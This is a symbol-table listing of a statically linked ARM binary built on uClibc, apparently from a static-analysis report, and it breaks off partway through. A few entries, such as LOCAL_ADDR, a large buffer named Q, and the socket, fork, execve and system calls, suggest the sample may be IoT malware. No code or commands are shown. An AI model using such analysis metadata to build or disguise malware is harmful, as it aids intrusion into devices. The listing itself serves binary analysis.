                              $d.symtab0x2a30c0NOTYPE<unknown>DEFAULT13
                              $d.symtab0x199380NOTYPE<unknown>DEFAULT2
                              $d.symtab0x19e580NOTYPE<unknown>DEFAULT2
                              $d.symtab0x19f140NOTYPE<unknown>DEFAULT2
                              $d.symtab0x19f940NOTYPE<unknown>DEFAULT2
                              $d.symtab0x19fc40NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a0440NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a0bc0NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a1200NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a1640NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a1c80NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a2680NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a2f40NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a3300NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a3700NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a3c40NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a4080NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a4480NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a4880NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a4e40NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a5280NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a5900NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a6200NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a6940NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1a7700NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1aaf40NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1ac600NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1b0140NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1b14c0NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1b2280NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1b4440NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1be180NOTYPE<unknown>DEFAULT2
                              $d.symtab0x218d80NOTYPE<unknown>DEFAULT4
                              $d.symtab0x1c0a00NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c1900NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c2940NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c3840NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c4700NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c6480NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c6b00NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c7200NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c95c0NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1c9bc0NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1ca6c0NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1cab80NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1cbfc0NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1cce40NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1ce1c0NOTYPE<unknown>DEFAULT2
                              $d.symtab0x2c0NOTYPE<unknown>DEFAULT21
                              $d.symtab0x4c0NOTYPE<unknown>DEFAULT21
                              $d.symtab0x530NOTYPE<unknown>DEFAULT21
                              $d.symtab0x1db9c0NOTYPE<unknown>DEFAULT2
                              $d.symtab0x1e5440NOTYPE<unknown>DEFAULT2
                              $d.symtab0x580NOTYPE<unknown>DEFAULT21
                              $d.symtab0x00NOTYPE<unknown>DEFAULT23
                              $d.symtab0x23c0NOTYPE<unknown>DEFAULT21
                              $d.symtab0xe390NOTYPE<unknown>DEFAULT23
                              $d.symtab0x2a1240NOTYPE<unknown>DEFAULT13
                              $d.symtab0x208420NOTYPE<unknown>DEFAULT4
                              C.11.5548.symtab0x2181c12OBJECT<unknown>DEFAULT4
                              C.5.5083.symtab0x20b4424OBJECT<unknown>DEFAULT4
                              C.7.5370.symtab0x2182812OBJECT<unknown>DEFAULT4
                              C.7.6078.symtab0x20b5c12OBJECT<unknown>DEFAULT4
                              C.7.6109.symtab0x20b8c12OBJECT<unknown>DEFAULT4
                              C.7.6182.symtab0x20b6812OBJECT<unknown>DEFAULT4
                              C.8.6110.symtab0x20b8012OBJECT<unknown>DEFAULT4
                              C.9.6119.symtab0x20b7412OBJECT<unknown>DEFAULT4
                              LOCAL_ADDR.symtab0x393a84OBJECT<unknown>DEFAULT14
                              Laligned.symtab0x156780NOTYPE<unknown>DEFAULT2
                              Llastword.symtab0x156940NOTYPE<unknown>DEFAULT2
                              Q.symtab0x2a35c16384OBJECT<unknown>DEFAULT14
                              _Exit.symtab0x1a0c0104FUNC<unknown>DEFAULT2
                              _GLOBAL_OFFSET_TABLE_.symtab0x2a0100OBJECT<unknown>HIDDEN12
                              _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _Unwind_Complete.symtab0x1d9504FUNC<unknown>HIDDEN2
                              _Unwind_DeleteException.symtab0x1d95444FUNC<unknown>HIDDEN2
                              _Unwind_ForcedUnwind.symtab0x1e60436FUNC<unknown>HIDDEN2
                              _Unwind_GetCFA.symtab0x1d9488FUNC<unknown>HIDDEN2
                              _Unwind_GetDataRelBase.symtab0x1d98c12FUNC<unknown>HIDDEN2
                              _Unwind_GetLanguageSpecificData.symtab0x1e62868FUNC<unknown>HIDDEN2
                              _Unwind_GetRegionStart.symtab0x1edc852FUNC<unknown>HIDDEN2
                              _Unwind_GetTextRelBase.symtab0x1d98012FUNC<unknown>HIDDEN2
                              _Unwind_RaiseException.symtab0x1e59836FUNC<unknown>HIDDEN2
                              _Unwind_Resume.symtab0x1e5bc36FUNC<unknown>HIDDEN2
                              _Unwind_Resume_or_Rethrow.symtab0x1e5e036FUNC<unknown>HIDDEN2
                              _Unwind_VRS_Get.symtab0x1d8b076FUNC<unknown>HIDDEN2
                              _Unwind_VRS_Pop.symtab0x1dec8324FUNC<unknown>HIDDEN2
                              _Unwind_VRS_Set.symtab0x1d8fc76FUNC<unknown>HIDDEN2
                              _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __C_ctype_b.symtab0x2a1244OBJECT<unknown>DEFAULT13
                              __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __C_ctype_b_data.symtab0x20842768OBJECT<unknown>DEFAULT4
                              __EH_FRAME_BEGIN__.symtab0x2a0000OBJECT<unknown>DEFAULT7
                              __FRAME_END__.symtab0x2a0000OBJECT<unknown>DEFAULT7
                              __GI___C_ctype_b.symtab0x2a1244OBJECT<unknown>HIDDEN13
                              __GI___close.symtab0x18f20100FUNC<unknown>HIDDEN2
                              __GI___close_nocancel.symtab0x18f0424FUNC<unknown>HIDDEN2
                              __GI___ctype_b.symtab0x2a1284OBJECT<unknown>HIDDEN13
                              __GI___errno_location.symtab0x1297432FUNC<unknown>HIDDEN2
                              __GI___fcntl_nocancel.symtab0x11af8152FUNC<unknown>HIDDEN2
                              __GI___fgetc_unlocked.symtab0x1bf7c300FUNC<unknown>HIDDEN2
                              __GI___glibc_strerror_r.symtab0x158c424FUNC<unknown>HIDDEN2
                              __GI___libc_close.symtab0x18f20100FUNC<unknown>HIDDEN2
                              __GI___libc_fcntl.symtab0x11b90244FUNC<unknown>HIDDEN2
                              __GI___libc_open.symtab0x18fb0100FUNC<unknown>HIDDEN2
                              __GI___libc_read.symtab0x190d0100FUNC<unknown>HIDDEN2
                              __GI___libc_write.symtab0x19040100FUNC<unknown>HIDDEN2
                              __GI___open.symtab0x18fb0100FUNC<unknown>HIDDEN2
                              __GI___open_nocancel.symtab0x18f9424FUNC<unknown>HIDDEN2
                              __GI___read.symtab0x190d0100FUNC<unknown>HIDDEN2
                              __GI___read_nocancel.symtab0x190b424FUNC<unknown>HIDDEN2
                              __GI___sigaddset.symtab0x1624836FUNC<unknown>HIDDEN2
                              __GI___sigdelset.symtab0x1626c36FUNC<unknown>HIDDEN2
                              __GI___sigismember.symtab0x1622436FUNC<unknown>HIDDEN2
                              __GI___uClibc_fini.symtab0x192e8124FUNC<unknown>HIDDEN2
                              __GI___uClibc_init.symtab0x193b888FUNC<unknown>HIDDEN2
                              __GI___write.symtab0x19040100FUNC<unknown>HIDDEN2
                              __GI___write_nocancel.symtab0x1902424FUNC<unknown>HIDDEN2
                              __GI___xpg_strerror_r.symtab0x158dc268FUNC<unknown>HIDDEN2
                              __GI__exit.symtab0x1a0c0104FUNC<unknown>HIDDEN2
                              __GI_abort.symtab0x17620296FUNC<unknown>HIDDEN2
                              __GI_accept.symtab0x15b28116FUNC<unknown>HIDDEN2
                              __GI_atoi.symtab0x17d9432FUNC<unknown>HIDDEN2
                              __GI_bind.symtab0x15b9c68FUNC<unknown>HIDDEN2
                              __GI_brk.symtab0x1ca2088FUNC<unknown>HIDDEN2
                              __GI_chdir.symtab0x11cc456FUNC<unknown>HIDDEN2
                              __GI_chmod.symtab0x11cfc64FUNC<unknown>HIDDEN2
                              __GI_close.symtab0x18f20100FUNC<unknown>HIDDEN2
                              __GI_closedir.symtab0x12490272FUNC<unknown>HIDDEN2
                              __GI_config_close.symtab0x1afa052FUNC<unknown>HIDDEN2
                              __GI_config_open.symtab0x1afd472FUNC<unknown>HIDDEN2
                              __GI_config_read.symtab0x1ac78808FUNC<unknown>HIDDEN2
                              __GI_connect.symtab0x15c24116FUNC<unknown>HIDDEN2
                              __GI_execve.symtab0x1a12864FUNC<unknown>HIDDEN2
                              __GI_exit.symtab0x17fa8196FUNC<unknown>HIDDEN2
                              __GI_fclose.symtab0x12a00816FUNC<unknown>HIDDEN2
                              __GI_fcntl.symtab0x11b90244FUNC<unknown>HIDDEN2
                              __GI_fdopen.symtab0x12d3060FUNC<unknown>HIDDEN2
                              __GI_fflush_unlocked.symtab0x1502c940FUNC<unknown>HIDDEN2
                              __GI_fgetc.symtab0x1be38324FUNC<unknown>HIDDEN2
                              __GI_fgetc_unlocked.symtab0x1bf7c300FUNC<unknown>HIDDEN2
                              __GI_fgets.symtab0x14a18284FUNC<unknown>HIDDEN2
                              __GI_fgets_unlocked.symtab0x153d8160FUNC<unknown>HIDDEN2
                              __GI_fopen.symtab0x12d6c32FUNC<unknown>HIDDEN2
                              __GI_fork.symtab0x1882c972FUNC<unknown>HIDDEN2
                              __GI_fprintf.symtab0x12e1448FUNC<unknown>HIDDEN2
                              __GI_fputs.symtab0x14b34284FUNC<unknown>HIDDEN2
                              __GI_fputs_unlocked.symtab0x1547856FUNC<unknown>HIDDEN2
                              __GI_fseek.symtab0x12d8c36FUNC<unknown>HIDDEN2
                              __GI_fseeko64.symtab0x12f78448FUNC<unknown>HIDDEN2
                              __GI_fstat.symtab0x1a168100FUNC<unknown>HIDDEN2
                              __GI_fwrite.symtab0x14c50300FUNC<unknown>HIDDEN2
                              __GI_fwrite_unlocked.symtab0x154b0188FUNC<unknown>HIDDEN2
                              __GI_getc_unlocked.symtab0x1bf7c300FUNC<unknown>HIDDEN2
                              __GI_getdtablesize.symtab0x1a26c44FUNC<unknown>HIDDEN2
                              __GI_getegid.symtab0x1a29820FUNC<unknown>HIDDEN2
                              __GI_geteuid.symtab0x1a2ac20FUNC<unknown>HIDDEN2
                              __GI_getgid.symtab0x1a2c020FUNC<unknown>HIDDEN2
                              __GI_getpagesize.symtab0x1a2d440FUNC<unknown>HIDDEN2
                              __GI_getpid.symtab0x18c9072FUNC<unknown>HIDDEN2
                              __GI_getrlimit.symtab0x1a2fc56FUNC<unknown>HIDDEN2
                              __GI_getsockname.symtab0x15c9868FUNC<unknown>HIDDEN2
                              __GI_gettimeofday.symtab0x1a33464FUNC<unknown>HIDDEN2
                              __GI_getuid.symtab0x1a37420FUNC<unknown>HIDDEN2
                              __GI_inet_addr.symtab0x15abc40FUNC<unknown>HIDDEN2
                              __GI_inet_aton.symtab0x1c558248FUNC<unknown>HIDDEN2
                              __GI_initstate_r.symtab0x17bb0248FUNC<unknown>HIDDEN2
                              __GI_ioctl.symtab0x11e58224FUNC<unknown>HIDDEN2
                              __GI_isatty.symtab0x15a1c36FUNC<unknown>HIDDEN2
                              __GI_kill.symtab0x11f3856FUNC<unknown>HIDDEN2
                              __GI_listen.symtab0x15d2464FUNC<unknown>HIDDEN2
                              __GI_lseek.symtab0x1a38864FUNC<unknown>HIDDEN2
                              __GI_lseek64.symtab0x1a628112FUNC<unknown>HIDDEN2
                              __GI_memchr.symtab0x1c0a8240FUNC<unknown>HIDDEN2
                              __GI_memcpy.symtab0x155704FUNC<unknown>HIDDEN2
                              __GI_memmove.symtab0x155804FUNC<unknown>HIDDEN2
                              __GI_mempcpy.symtab0x1c19836FUNC<unknown>HIDDEN2
                              __GI_memrchr.symtab0x1c1bc224FUNC<unknown>HIDDEN2
                              __GI_memset.symtab0x15590156FUNC<unknown>HIDDEN2
                              __GI_mkdir.symtab0x11f7064FUNC<unknown>HIDDEN2
                              __GI_mmap.symtab0x19f20124FUNC<unknown>HIDDEN2
                              __GI_mremap.symtab0x1a3c868FUNC<unknown>HIDDEN2
                              __GI_munmap.symtab0x1a40c64FUNC<unknown>HIDDEN2
                              __GI_nanosleep.symtab0x1a48c96FUNC<unknown>HIDDEN2
                              __GI_open.symtab0x18fb0100FUNC<unknown>HIDDEN2
                              __GI_open64.symtab0x1cc04240FUNC<unknown>HIDDEN2
                              __GI_opendir.symtab0x12670196FUNC<unknown>HIDDEN2
                              __GI_raise.symtab0x18cd8240FUNC<unknown>HIDDEN2
                              __GI_random.symtab0x17788164FUNC<unknown>HIDDEN2
                              __GI_random_r.symtab0x17a48144FUNC<unknown>HIDDEN2
                              __GI_read.symtab0x190d0100FUNC<unknown>HIDDEN2
                              __GI_readdir.symtab0x127e4232FUNC<unknown>HIDDEN2
                              __GI_readdir64.symtab0x1a698236FUNC<unknown>HIDDEN2
                              __GI_readlink.symtab0x1203864FUNC<unknown>HIDDEN2
                              __GI_recv.symtab0x15da8112FUNC<unknown>HIDDEN2
                              __GI_recvfrom.symtab0x15e60136FUNC<unknown>HIDDEN2
                              __GI_remove.symtab0x12db0100FUNC<unknown>HIDDEN2
                              __GI_rmdir.symtab0x1a4ec64FUNC<unknown>HIDDEN2
                              __GI_sbrk.symtab0x1a52c108FUNC<unknown>HIDDEN2
                              __GI_select.symtab0x120f4132FUNC<unknown>HIDDEN2
                              __GI_send.symtab0x15f2c112FUNC<unknown>HIDDEN2
                              __GI_sendto.symtab0x15fe8136FUNC<unknown>HIDDEN2
                              __GI_setsid.symtab0x1217864FUNC<unknown>HIDDEN2
                              __GI_setsockopt.symtab0x1607072FUNC<unknown>HIDDEN2
                              __GI_setstate_r.symtab0x17ca8236FUNC<unknown>HIDDEN2
                              __GI_sigaction.symtab0x19fc8136FUNC<unknown>HIDDEN2
                              __GI_sigaddset.symtab0x160fc80FUNC<unknown>HIDDEN2
                              __GI_sigemptyset.symtab0x1614c20FUNC<unknown>HIDDEN2
                              __GI_signal.symtab0x16160196FUNC<unknown>HIDDEN2
                              __GI_sigprocmask.symtab0x121b8140FUNC<unknown>HIDDEN2
                              __GI_sleep.symtab0x18dc8300FUNC<unknown>HIDDEN2
                              __GI_snprintf.symtab0x12e4448FUNC<unknown>HIDDEN2
                              __GI_socket.symtab0x160b868FUNC<unknown>HIDDEN2
                              __GI_sprintf.symtab0x12e7452FUNC<unknown>HIDDEN2
                              __GI_srandom_r.symtab0x17ad8216FUNC<unknown>HIDDEN2
                              __GI_stat.symtab0x12244100FUNC<unknown>HIDDEN2
                              __GI_strcat.symtab0x156b040FUNC<unknown>HIDDEN2
                              __GI_strchr.symtab0x1c29c240FUNC<unknown>HIDDEN2
                              __GI_strchrnul.symtab0x1c38c236FUNC<unknown>HIDDEN2
                              __GI_strcmp.symtab0x1563028FUNC<unknown>HIDDEN2
                              __GI_strcoll.symtab0x1563028FUNC<unknown>HIDDEN2
                              __GI_strcpy.symtab0x156d836FUNC<unknown>HIDDEN2
                              __GI_strcspn.symtab0x1c47868FUNC<unknown>HIDDEN2
                              __GI_strdup.symtab0x159e852FUNC<unknown>HIDDEN2
                              __GI_strlen.symtab0x1565096FUNC<unknown>HIDDEN2
                              __GI_strnlen.symtab0x156fc204FUNC<unknown>HIDDEN2
                              __GI_strrchr.symtab0x1c4bc80FUNC<unknown>HIDDEN2
                              __GI_strspn.symtab0x1c50c76FUNC<unknown>HIDDEN2
                              __GI_strstr.symtab0x157c8252FUNC<unknown>HIDDEN2
                              __GI_strtol.symtab0x17db428FUNC<unknown>HIDDEN2
                              __GI_sysconf.symtab0x181b81572FUNC<unknown>HIDDEN2
                              __GI_tcgetattr.symtab0x15a40124FUNC<unknown>HIDDEN2
                              __GI_time.symtab0x122a848FUNC<unknown>HIDDEN2
                              __GI_times.symtab0x1a59820FUNC<unknown>HIDDEN2
                              __GI_unlink.symtab0x122d864FUNC<unknown>HIDDEN2
                              __GI_vfprintf.symtab0x138b0324FUNC<unknown>HIDDEN2
                              __GI_vsnprintf.symtab0x12ea8208FUNC<unknown>HIDDEN2
                              __GI_wait4.symtab0x1ca8456FUNC<unknown>HIDDEN2
                              __GI_waitpid.symtab0x1a5ac124FUNC<unknown>HIDDEN2
                              __GI_wcrtomb.symtab0x1b01c84FUNC<unknown>HIDDEN2
                              __GI_wcsnrtombs.symtab0x1b094188FUNC<unknown>HIDDEN2
                              __GI_wcsrtombs.symtab0x1b07036FUNC<unknown>HIDDEN2
                              __GI_write.symtab0x19040100FUNC<unknown>HIDDEN2
                              __JCR_END__.symtab0x2a00c0OBJECT<unknown>DEFAULT11
                              __JCR_LIST__.symtab0x2a00c0OBJECT<unknown>DEFAULT11
                              ___Unwind_ForcedUnwind.symtab0x1e60436FUNC<unknown>HIDDEN2
                              ___Unwind_RaiseException.symtab0x1e59836FUNC<unknown>HIDDEN2
                              ___Unwind_Resume.symtab0x1e5bc36FUNC<unknown>HIDDEN2
                              ___Unwind_Resume_or_Rethrow.symtab0x1e5e036FUNC<unknown>HIDDEN2
                              ___path_search.symtab0x1ab2c332FUNC<unknown>HIDDEN2
                              __adddf3.symtab0x1cfb0784FUNC<unknown>HIDDEN2
                              __aeabi_cdcmpeq.symtab0x11a5424FUNC<unknown>HIDDEN2
                              __aeabi_cdcmple.symtab0x11a5424FUNC<unknown>HIDDEN2
                              __aeabi_cdrcmple.symtab0x11a3852FUNC<unknown>HIDDEN2
                              __aeabi_d2uiz.symtab0x1d85c84FUNC<unknown>HIDDEN2
                              __aeabi_dadd.symtab0x1cfb0784FUNC<unknown>HIDDEN2
                              __aeabi_dcmpeq.symtab0x11a6c24FUNC<unknown>HIDDEN2
                              __aeabi_dcmpge.symtab0x11ab424FUNC<unknown>HIDDEN2
                              __aeabi_dcmpgt.symtab0x11acc24FUNC<unknown>HIDDEN2
                              __aeabi_dcmple.symtab0x11a9c24FUNC<unknown>HIDDEN2
                              __aeabi_dcmplt.symtab0x11a8424FUNC<unknown>HIDDEN2
                              __aeabi_ddiv.symtab0x1d650524FUNC<unknown>HIDDEN2
                              __aeabi_dmul.symtab0x1d3c0656FUNC<unknown>HIDDEN2
                              __aeabi_drsub.symtab0x1cfa40FUNC<unknown>HIDDEN2
                              __aeabi_dsub.symtab0x1cfac788FUNC<unknown>HIDDEN2
                              __aeabi_f2d.symtab0x1d30c64FUNC<unknown>HIDDEN2
                              __aeabi_i2d.symtab0x1d2e440FUNC<unknown>HIDDEN2
                              __aeabi_idiv.symtab0x1ce600FUNC<unknown>HIDDEN2
                              __aeabi_idivmod.symtab0x1cf8c24FUNC<unknown>HIDDEN2
                              __aeabi_l2d.symtab0x1d36096FUNC<unknown>HIDDEN2
                              __aeabi_read_tp.symtab0x1a0708FUNC<unknown>DEFAULT2
                              __aeabi_ui2d.symtab0x1d2c036FUNC<unknown>HIDDEN2
                              __aeabi_uidiv.symtab0x118900FUNC<unknown>HIDDEN2
                              __aeabi_uidivmod.symtab0x1198c24FUNC<unknown>HIDDEN2
                              __aeabi_ul2d.symtab0x1d34c116FUNC<unknown>HIDDEN2
                              __aeabi_unwind_cpp_pr0.symtab0x1e5648FUNC<unknown>HIDDEN2
                              __aeabi_unwind_cpp_pr1.symtab0x1e55c8FUNC<unknown>HIDDEN2
                              __aeabi_unwind_cpp_pr2.symtab0x1e5548FUNC<unknown>HIDDEN2
                              __app_fini.symtab0x309144OBJECT<unknown>HIDDEN14
                              __atexit_lock.symtab0x2a2f424OBJECT<unknown>DEFAULT13
                              __bss_end__.symtab0x398480NOTYPE<unknown>DEFAULTSHN_ABS
                              __bss_start.symtab0x2a3180NOTYPE<unknown>DEFAULTSHN_ABS
                              __bss_start__.symtab0x2a3180NOTYPE<unknown>DEFAULTSHN_ABS
                              __check_one_fd.symtab0x1936484FUNC<unknown>DEFAULT2
                              __close.symtab0x18f20100FUNC<unknown>DEFAULT2
                              __close_nocancel.symtab0x18f0424FUNC<unknown>DEFAULT2
                              __cmpdf2.symtab0x119b4132FUNC<unknown>HIDDEN2
                              __ctype_b.symtab0x2a1284OBJECT<unknown>DEFAULT13
                              __curbrk.symtab0x30e944OBJECT<unknown>HIDDEN14
                              __cxa_begin_cleanup.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __cxa_call_unexpected.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __cxa_type_match.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __data_start.symtab0x2a0b80NOTYPE<unknown>DEFAULT13
                              __default_rt_sa_restorer.symtab0x1a0680FUNC<unknown>DEFAULT2
                              __default_sa_restorer.symtab0x1a05c0FUNC<unknown>DEFAULT2
                              __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __div0.symtab0x11ae420FUNC<unknown>HIDDEN2
                              __divdf3.symtab0x1d650524FUNC<unknown>HIDDEN2
                              __divsi3.symtab0x1ce60300FUNC<unknown>HIDDEN2
                              __do_global_dtors_aux.symtab0x80f00FUNC<unknown>DEFAULT2
                              __do_global_dtors_aux_fini_array_entry.symtab0x2a0080OBJECT<unknown>DEFAULT10
                              __end__.symtab0x398480NOTYPE<unknown>DEFAULTSHN_ABS
                              __environ.symtab0x3090c4OBJECT<unknown>DEFAULT14
                              __eqdf2.symtab0x119b4132FUNC<unknown>HIDDEN2
                              __errno_location.symtab0x1297432FUNC<unknown>DEFAULT2
                              __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __exidx_end.symtab0x21a580NOTYPE<unknown>DEFAULTSHN_ABS
                              __exidx_start.symtab0x219380NOTYPE<unknown>DEFAULTSHN_ABS
                              __exit_cleanup.symtab0x303bc4OBJECT<unknown>HIDDEN14
                              __extendsfdf2.symtab0x1d30c64FUNC<unknown>HIDDEN2
                              __fcntl_nocancel.symtab0x11af8152FUNC<unknown>DEFAULT2
                              __fgetc_unlocked.symtab0x1bf7c300FUNC<unknown>DEFAULT2
                              __fini_array_end.symtab0x2a00c0NOTYPE<unknown>HIDDEN10
                              __fini_array_start.symtab0x2a0080NOTYPE<unknown>HIDDEN10
                              __fixunsdfsi.symtab0x1d85c84FUNC<unknown>HIDDEN2
                              __floatdidf.symtab0x1d36096FUNC<unknown>HIDDEN2
                              __floatsidf.symtab0x1d2e440FUNC<unknown>HIDDEN2
                              __floatundidf.symtab0x1d34c116FUNC<unknown>HIDDEN2
                              __floatunsidf.symtab0x1d2c036FUNC<unknown>HIDDEN2
                              __fork.symtab0x1882c972FUNC<unknown>DEFAULT2
                              __fork_generation_pointer.symtab0x398144OBJECT<unknown>HIDDEN14
                              __fork_handlers.symtab0x398184OBJECT<unknown>HIDDEN14
                              __fork_lock.symtab0x303c04OBJECT<unknown>HIDDEN14
                              __frame_dummy_init_array_entry.symtab0x2a0040OBJECT<unknown>DEFAULT9
                              __gedf2.symtab0x119a4148FUNC<unknown>HIDDEN2
                              __gen_tempname.symtab0x1a7c0876FUNC<unknown>HIDDEN2
                              __getdents.symtab0x1a1cc160FUNC<unknown>HIDDEN2
                              __getdents64.symtab0x1cabc328FUNC<unknown>HIDDEN2
                              __getpagesize.symtab0x1a2d440FUNC<unknown>DEFAULT2
                              __getpid.symtab0x18c9072FUNC<unknown>DEFAULT2
                              __glibc_strerror_r.symtab0x158c424FUNC<unknown>DEFAULT2
                              __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __gnu_Unwind_Find_exidx.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __gnu_Unwind_ForcedUnwind.symtab0x1dd0828FUNC<unknown>HIDDEN2
                              __gnu_Unwind_RaiseException.symtab0x1ddf0184FUNC<unknown>HIDDEN2
                              __gnu_Unwind_Restore_VFP.symtab0x1e5880FUNC<unknown>HIDDEN2
                              __gnu_Unwind_Resume.symtab0x1dd84108FUNC<unknown>HIDDEN2
                              __gnu_Unwind_Resume_or_Rethrow.symtab0x1dea832FUNC<unknown>HIDDEN2
                              __gnu_Unwind_Save_VFP.symtab0x1e5900FUNC<unknown>HIDDEN2
                              __gnu_unwind_execute.symtab0x1e66c1812FUNC<unknown>HIDDEN2
                              __gnu_unwind_frame.symtab0x1ed8072FUNC<unknown>HIDDEN2
                              __gnu_unwind_pr_common.symtab0x1e00c1352FUNC<unknown>DEFAULT2
                              __gtdf2.symtab0x119a4148FUNC<unknown>HIDDEN2
                              __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __init_array_end.symtab0x2a0080NOTYPE<unknown>HIDDEN9
                              __init_array_start.symtab0x2a0040NOTYPE<unknown>HIDDEN9
                              __ledf2.symtab0x119ac140FUNC<unknown>HIDDEN2
                              __libc_accept.symtab0x15b28116FUNC<unknown>DEFAULT2
                              __libc_close.symtab0x18f20100FUNC<unknown>DEFAULT2
                              __libc_connect.symtab0x15c24116FUNC<unknown>DEFAULT2
                              __libc_disable_asynccancel.symtab0x19140136FUNC<unknown>HIDDEN2
                              __libc_enable_asynccancel.symtab0x191c8220FUNC<unknown>HIDDEN2
                              __libc_errno.symtab0x04TLS<unknown>HIDDEN8
                              __libc_fcntl.symtab0x11b90244FUNC<unknown>DEFAULT2
                              __libc_fork.symtab0x1882c972FUNC<unknown>DEFAULT2
                              __libc_h_errno.symtab0x44TLS<unknown>HIDDEN8
                              __libc_multiple_threads.symtab0x3981c4OBJECT<unknown>HIDDEN14
                              __libc_nanosleep.symtab0x1a48c96FUNC<unknown>DEFAULT2
                              __libc_open.symtab0x18fb0100FUNC<unknown>DEFAULT2
                              __libc_read.symtab0x190d0100FUNC<unknown>DEFAULT2
                              __libc_recv.symtab0x15da8112FUNC<unknown>DEFAULT2
                              __libc_recvfrom.symtab0x15e60136FUNC<unknown>DEFAULT2
                              __libc_select.symtab0x120f4132FUNC<unknown>DEFAULT2
                              __libc_send.symtab0x15f2c112FUNC<unknown>DEFAULT2
                              __libc_sendto.symtab0x15fe8136FUNC<unknown>DEFAULT2
                              __libc_setup_tls.symtab0x1c754560FUNC<unknown>DEFAULT2
                              __libc_sigaction.symtab0x19fc8136FUNC<unknown>DEFAULT2
                              __libc_stack_end.symtab0x309084OBJECT<unknown>DEFAULT14
                              __libc_system.symtab0x19e9c132FUNC<unknown>DEFAULT2
                              __libc_waitpid.symtab0x1a5ac124FUNC<unknown>DEFAULT2
                              __libc_write.symtab0x19040100FUNC<unknown>DEFAULT2
                              __lll_lock_wait_private.symtab0x18bf8152FUNC<unknown>HIDDEN2
                              __ltdf2.symtab0x119ac140FUNC<unknown>HIDDEN2
                              __malloc_consolidate.symtab0x171f0436FUNC<unknown>HIDDEN2
                              __malloc_largebin_index.symtab0x16290120FUNC<unknown>DEFAULT2
                              __malloc_lock.symtab0x2a21824OBJECT<unknown>DEFAULT13
                              __malloc_state.symtab0x3949c888OBJECT<unknown>DEFAULT14
                              __malloc_trim.symtab0x17140176FUNC<unknown>DEFAULT2
                              __muldf3.symtab0x1d3c0656FUNC<unknown>HIDDEN2
                              __nedf2.symtab0x119b4132FUNC<unknown>HIDDEN2
                              __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __open.symtab0x18fb0100FUNC<unknown>DEFAULT2
                              __open_nocancel.symtab0x18f9424FUNC<unknown>DEFAULT2
                              __pagesize.symtab0x309104OBJECT<unknown>DEFAULT14
                              __preinit_array_end.symtab0x2a0040NOTYPE<unknown>HIDDEN8
                              __preinit_array_start.symtab0x2a0040NOTYPE<unknown>HIDDEN8
                              __progname.symtab0x2a3104OBJECT<unknown>DEFAULT13
                              __progname_full.symtab0x2a3144OBJECT<unknown>DEFAULT13
                              __pthread_initialize_minimal.symtab0x1c98412FUNC<unknown>DEFAULT2
                              __pthread_mutex_init.symtab0x192ac8FUNC<unknown>DEFAULT2
                              __pthread_mutex_lock.symtab0x192a48FUNC<unknown>DEFAULT2
                              __pthread_mutex_trylock.symtab0x192a48FUNC<unknown>DEFAULT2
                              __pthread_mutex_unlock.symtab0x192a48FUNC<unknown>DEFAULT2
                              __pthread_return_0.symtab0x192a48FUNC<unknown>DEFAULT2
                              __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __read.symtab0x190d0100FUNC<unknown>DEFAULT2
                              __read_nocancel.symtab0x190b424FUNC<unknown>DEFAULT2
                              __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __restore_core_regs.symtab0x1e56c28FUNC<unknown>HIDDEN2
                              __rtld_fini.symtab0x309184OBJECT<unknown>HIDDEN14
